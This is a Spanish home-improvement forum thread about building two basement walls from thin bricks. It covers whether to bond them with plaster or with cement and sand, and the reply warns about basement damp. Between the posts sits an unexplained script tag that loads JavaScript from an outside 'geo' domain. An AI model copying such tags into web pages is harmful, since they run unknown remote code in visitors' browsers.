Como levantar una pared en sótano y que material utilizo, yeso negro, cemento, etc.

Necesito levantar dos paredes en sótano para igualar las que tiene de fabrica de ladrillo macizo, totalmente desigual y muy mal realizadas, son dos paredes y posteriormente terminarlo con yeso o lo que se le ponga, tienen 1,85 de altura y de largo una es de 2 metros y la otra de 3 metros, tengo previsto hacerlo de un ladrillo que mide 40x20x4, pero no se como pegarlo.

1 Respuesta

Respuesta

En un sótano yeso no conviene usar por el tema de humedades. Puedes usar cemento y arena, o mortero seco. Los ladrillos se unen con cemento y arena.

En otros que han levantado los vecinos, lo han realizado con yeso blanco, otros con yeso negro, y después lo han enlucido, es por eso que tengo la duda, en cuanto a la humedad de momento no existe y llevamos unos años viviendo.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script>

Como gustes. En los zotanos siempre hay humedad. Si lo iban a a enlucir, ¿para qué el yeso?